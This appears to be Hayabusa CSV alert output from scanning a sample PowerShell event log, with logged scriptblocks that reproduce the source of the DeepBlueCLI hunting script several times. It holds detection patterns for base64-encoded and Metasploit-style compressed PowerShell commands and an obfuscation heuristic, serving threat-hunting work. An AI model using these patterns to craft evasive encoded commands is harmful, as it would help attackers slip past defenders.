$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:15.018 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:15.019 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:15.019 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:47:15.910 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:18.979 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:18.983 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.Strin",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:49:18.983 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in 